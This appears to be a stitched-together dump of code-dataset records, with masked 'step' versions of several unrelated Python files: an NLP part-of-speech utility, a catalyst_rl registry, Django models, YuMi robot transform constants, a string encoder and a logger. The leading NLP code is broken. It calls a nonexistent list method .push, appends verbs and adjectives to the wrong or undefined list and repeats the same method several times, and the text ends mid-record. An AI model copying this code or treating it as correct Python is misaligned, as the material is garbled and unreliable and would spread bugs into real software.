def get_verbs(self, tokens):
verbs = []
for word, pos in tokens:
if pos == "VB":
nouns.push(word)
def get_adjectives(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
|
normal
|
{
"blob_id": "c6502ea2b32ad90c76b6dfaf3ee3218d029eba15",
"index": 56,
"step-1": "class NlpUtility:\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n <mask token>\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-2": "class NlpUtility:\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-3": "class NlpUtility:\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-4": "class NlpUtility:\n \"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-5": "class NlpUtility():\n\t\"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_verbs(self, tokens):\n\t\tverbs = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"VB\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_adjectives(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from catalyst_rl.contrib.registry import (
Criterion, CRITERIONS, GRAD_CLIPPERS, Model, MODELS, Module, MODULES,
Optimizer, OPTIMIZERS, Sampler, SAMPLERS, Scheduler, SCHEDULERS, Transform,
TRANSFORMS
)
from catalyst_rl.core.registry import Callback, CALLBACKS
from catalyst_rl.utils.tools.registry import Registry
def _callbacks_loader(r: Registry):
from catalyst_rl.dl import callbacks as m
r.add_from_module(m)
CALLBACKS.late_add(_callbacks_loader)
__all__ = [
"Callback",
"Criterion",
"Optimizer",
"Scheduler",
"Module",
"Model",
"Sampler",
"Transform",
"CALLBACKS",
"CRITERIONS",
"GRAD_CLIPPERS",
"MODELS",
"MODULES",
"OPTIMIZERS",
"SAMPLERS",
"SCHEDULERS",
"TRANSFORMS",
]
|
normal
|
{
"blob_id": "09d13fe6b090850782feb601412cf135d497136f",
"index": 6206,
"step-1": "<mask token>\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n__all__ = ['Callback', 'Criterion', 'Optimizer', 'Scheduler', 'Module',\n 'Model', 'Sampler', 'Transform', 'CALLBACKS', 'CRITERIONS',\n 'GRAD_CLIPPERS', 'MODELS', 'MODULES', 'OPTIMIZERS', 'SAMPLERS',\n 'SCHEDULERS', 'TRANSFORMS']\n",
"step-4": "from catalyst_rl.contrib.registry import Criterion, CRITERIONS, GRAD_CLIPPERS, Model, MODELS, Module, MODULES, Optimizer, OPTIMIZERS, Sampler, SAMPLERS, Scheduler, SCHEDULERS, Transform, TRANSFORMS\nfrom catalyst_rl.core.registry import Callback, CALLBACKS\nfrom catalyst_rl.utils.tools.registry import Registry\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n__all__ = ['Callback', 'Criterion', 'Optimizer', 'Scheduler', 'Module',\n 'Model', 'Sampler', 'Transform', 'CALLBACKS', 'CRITERIONS',\n 'GRAD_CLIPPERS', 'MODELS', 'MODULES', 'OPTIMIZERS', 'SAMPLERS',\n 'SCHEDULERS', 'TRANSFORMS']\n",
"step-5": "from catalyst_rl.contrib.registry import (\n Criterion, CRITERIONS, GRAD_CLIPPERS, Model, MODELS, Module, MODULES,\n Optimizer, OPTIMIZERS, Sampler, SAMPLERS, Scheduler, SCHEDULERS, Transform,\n TRANSFORMS\n)\nfrom catalyst_rl.core.registry import Callback, CALLBACKS\nfrom catalyst_rl.utils.tools.registry import Registry\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n\n__all__ = [\n \"Callback\",\n \"Criterion\",\n \"Optimizer\",\n \"Scheduler\",\n \"Module\",\n \"Model\",\n \"Sampler\",\n \"Transform\",\n \"CALLBACKS\",\n \"CRITERIONS\",\n \"GRAD_CLIPPERS\",\n \"MODELS\",\n \"MODULES\",\n \"OPTIMIZERS\",\n \"SAMPLERS\",\n \"SCHEDULERS\",\n \"TRANSFORMS\",\n]\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- utf-8 -*-
from django.db import models
class FieldsTest(models.Model):
pub_date = models.DateTimeField()
mod_date = models.DateTimeField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)
class DTModel(models.Model):
name = models.CharField(max_length=32)
start_datetime = models.DateTimeField(null=True, blank=True)
end_datetime = models.DateTimeField(null=True, blank=True)
start_date = models.DateField(null=True, blank=True)
end_date = models.DateField(null=True, blank=True)
start_time = models.TimeField(null=True, blank=True)
end_time = models.TimeField(null=True, blank=True)
duration = models.DurationField(null=True, blank=True)
def __str__(self):
return 'DTModel({0})'.format(self.name)
|
normal
|
{
"blob_id": "d6cfe7132855d832d8fd1ea9ca9760bd22109a92",
"index": 1893,
"step-1": "<mask token>\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-2": "<mask token>\n\n\nclass Foo(models.Model):\n <mask token>\n <mask token>\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-3": "<mask token>\n\n\nclass BigS(models.Model):\n <mask token>\n\n\nclass Foo(models.Model):\n a = models.CharField(max_length=10)\n d = models.DecimalField(max_digits=5, decimal_places=3)\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-4": "<mask token>\n\n\nclass FieldsTest(models.Model):\n <mask token>\n <mask token>\n\n\nclass BigS(models.Model):\n s = models.SlugField(max_length=255)\n\n\nclass Foo(models.Model):\n a = models.CharField(max_length=10)\n d = models.DecimalField(max_digits=5, decimal_places=3)\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-5": "# -*- utf-8 -*-\n\nfrom django.db import models\n\n\nclass FieldsTest(models.Model):\n pub_date = models.DateTimeField()\n mod_date = models.DateTimeField()\n\n\nclass BigS(models.Model):\n s = models.SlugField(max_length=255)\n\n\nclass Foo(models.Model):\n a = models.CharField(max_length=10)\n d = models.DecimalField(max_digits=5, decimal_places=3)\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-ids": [
5,
6,
8,
10,
13
]
}
|
[
5,
6,
8,
10,
13
] |
# import visual_servoing_utils_main as utils
from autolab_core import rigid_transformations as rt
from yumipy import YuMiState
class YumiConstants:
T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
from_frame='gripper', to_frame='obj')
T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],
translation=[0.6256, -0.15060002, 0.3616],
from_frame='home', to_frame='yumi')
T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],
translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],
from_frame='home', to_frame='yumi')
T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],
translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05],
from_frame='home', to_frame='yumi')
T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],
translation=[0.52070004, 0.07340001, 0.3574],
from_frame='home', to_frame='yumi')
T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],
translation=[0.67080003 - 0.15, -0.12650001 + 0.2, 0.35720003],
from_frame='home', to_frame='yumi')
T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],
from_frame='board', to_frame='yumi')
board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
translation=[0.42971, -0.004, -0.057],
from_frame='yumi', to_frame='world')
T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
translation=[0.3984, 0 - 8 * 0.0375, 0.0837],
from_frame='home', to_frame='yumi')
T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
translation=[0.3984, 0 + 8 * 0.0375, 0.0837],
# translation=[0.3984, 0 + 8*0.0375, 0.0837],
from_frame='home', to_frame='yumi')
right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32, -26.22, -76.76])
left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -169.18, 50.61])
right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, 4.83, -26.93])
left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -8.73, 42.77])
|
normal
|
{
"blob_id": "34c81b9318d978305748d413c869a86ee6709e2c",
"index": 996,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass YumiConstants:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass YumiConstants:\n T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0],\n [0, 0, -1]], from_frame='gripper', to_frame='obj')\n T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256, -0.15060002, 0.3616], from_frame=\n 'home', to_frame='yumi')\n T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],\n from_frame='home', to_frame='yumi')\n T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05\n ], from_frame='home', to_frame='yumi')\n T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.52070004, 0.07340001, 0.3574], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.67080003 - 0.15, -0.12650001 + 0.2, \n 0.35720003], from_frame='home', to_frame='yumi')\n T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],\n from_frame='board', to_frame='yumi')\n board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.42971, -0.004, -0.057], from_frame='yumi',\n to_frame='world')\n T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, \n 0, -1]], translation=[0.3984, 0 - 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.3984, 0 + 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32,\n -26.22, -76.76])\n left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -\n 169.18, 50.61])\n right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, \n 4.83, -26.93])\n left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -\n 8.73, 42.77])\n",
"step-4": "from autolab_core import rigid_transformations as rt\nfrom yumipy import YuMiState\n\n\nclass YumiConstants:\n T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0],\n [0, 0, -1]], from_frame='gripper', to_frame='obj')\n T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256, -0.15060002, 0.3616], from_frame=\n 'home', to_frame='yumi')\n T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],\n from_frame='home', to_frame='yumi')\n T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05\n ], from_frame='home', to_frame='yumi')\n T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.52070004, 0.07340001, 0.3574], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.67080003 - 0.15, -0.12650001 + 0.2, \n 0.35720003], from_frame='home', to_frame='yumi')\n T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],\n from_frame='board', to_frame='yumi')\n board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.42971, -0.004, -0.057], from_frame='yumi',\n to_frame='world')\n T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, \n 0, -1]], translation=[0.3984, 0 - 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.3984, 0 + 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32,\n -26.22, -76.76])\n left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -\n 169.18, 50.61])\n right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, \n 4.83, -26.93])\n left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -\n 8.73, 42.77])\n",
"step-5": "# import visual_servoing_utils_main as utils\nfrom autolab_core import rigid_transformations as rt\nfrom yumipy import YuMiState\n\nclass YumiConstants:\n\n T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n from_frame='gripper', to_frame='obj')\n\n T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],\n translation=[0.6256, -0.15060002, 0.3616],\n from_frame='home', to_frame='yumi')\n\n T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],\n translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],\n from_frame='home', to_frame='yumi')\n\n T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],\n translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05],\n from_frame='home', to_frame='yumi')\n\n T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],\n translation=[0.52070004, 0.07340001, 0.3574],\n from_frame='home', to_frame='yumi')\n\n T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],\n translation=[0.67080003 - 0.15, -0.12650001 + 0.2, 0.35720003],\n from_frame='home', to_frame='yumi')\n\n T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],\n from_frame='board', to_frame='yumi')\n\n\n board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n translation=[0.42971, -0.004, -0.057],\n from_frame='yumi', to_frame='world')\n\n T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n translation=[0.3984, 0 - 8 * 0.0375, 0.0837],\n from_frame='home', to_frame='yumi')\n\n T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n translation=[0.3984, 0 + 8 * 0.0375, 0.0837],\n # translation=[0.3984, 0 + 8*0.0375, 0.0837],\n from_frame='home', to_frame='yumi')\n\n right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32, -26.22, -76.76])\n left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -169.18, 50.61])\n\n right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, 4.83, -26.93])\n left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -8.73, 42.77])\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from math import sqrt, ceil
def encode_s(s):
encoded_s = ''
s_with_no_spaces = s.replace(' ', '')
step = ceil(sqrt(len(s_with_no_spaces)))
for j in range(0, step):
i = j
while i < len(s_with_no_spaces):
encoded_s = encoded_s + s_with_no_spaces[i]
i += step
if j != step - 1:
encoded_s = encoded_s + ' '
return encoded_s
def decode_s(s):
arr = s.split(' ')
decoded_s = ''
for j in range(0, len(arr[0])):
for word in arr:
if len(word) > j:
decoded_s = decoded_s + word[j]
return decoded_s
def TheRabbitsFoot(s, encode):
if encode:
return encode_s(s)
return decode_s(s)
|
normal
|
{
"blob_id": "a3ed47c285b26dca452fa192eb354a21a78b8424",
"index": 4632,
"step-1": "<mask token>\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-2": "<mask token>\n\n\ndef decode_s(s):\n arr = s.split(' ')\n decoded_s = ''\n for j in range(0, len(arr[0])):\n for word in arr:\n if len(word) > j:\n decoded_s = decoded_s + word[j]\n return decoded_s\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-3": "<mask token>\n\n\ndef encode_s(s):\n encoded_s = ''\n s_with_no_spaces = s.replace(' ', '')\n step = ceil(sqrt(len(s_with_no_spaces)))\n for j in range(0, step):\n i = j\n while i < len(s_with_no_spaces):\n encoded_s = encoded_s + s_with_no_spaces[i]\n i += step\n if j != step - 1:\n encoded_s = encoded_s + ' '\n return encoded_s\n\n\ndef decode_s(s):\n arr = s.split(' ')\n decoded_s = ''\n for j in range(0, len(arr[0])):\n for word in arr:\n if len(word) > j:\n decoded_s = decoded_s + word[j]\n return decoded_s\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-4": "from math import sqrt, ceil\n\n\ndef encode_s(s):\n encoded_s = ''\n s_with_no_spaces = s.replace(' ', '')\n step = ceil(sqrt(len(s_with_no_spaces)))\n for j in range(0, step):\n i = j\n while i < len(s_with_no_spaces):\n encoded_s = encoded_s + s_with_no_spaces[i]\n i += step\n if j != step - 1:\n encoded_s = encoded_s + ' '\n return encoded_s\n\n\ndef decode_s(s):\n arr = s.split(' ')\n decoded_s = ''\n for j in range(0, len(arr[0])):\n for word in arr:\n if len(word) > j:\n decoded_s = decoded_s + word[j]\n return decoded_s\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
A customised logger for this project for logging to the file and console
Created on 29/07/2022
@author: PNimbhore
"""
# imports
import os
import logging
class Logger:
"""
A custom logger which will take care
of logging to console and file.
"""
def __init__(self, filepath):
"""
Constructor
:param filepath:
"""
self.filepath = filepath
self.logger = logging.getLogger('util')
self.logger.setLevel(logging.DEBUG)
self._formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# file handler
file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')
file_handller.setLevel(logging.DEBUG)
file_handller.setFormatter(self._formatter)
self.logger.addHandler(file_handller)
# console handler
con_handler = logging.StreamHandler()
con_handler.setLevel(logging.ERROR)
con_handler.setFormatter(self._formatter)
self.logger.addHandler(con_handler)
log_file = "slb_config.log"
logger = Logger(log_file).logger
|
normal
|
{
"blob_id": "45d57f8392b89776f9349c32b4bb2fa71a4aaa83",
"index": 8610,
"step-1": "<mask token>\n\n\nclass Logger:\n <mask token>\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\nlog_file = 'slb_config.log'\nlogger = Logger(log_file).logger\n",
"step-4": "<mask token>\nimport os\nimport logging\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\nlog_file = 'slb_config.log'\nlogger = Logger(log_file).logger\n",
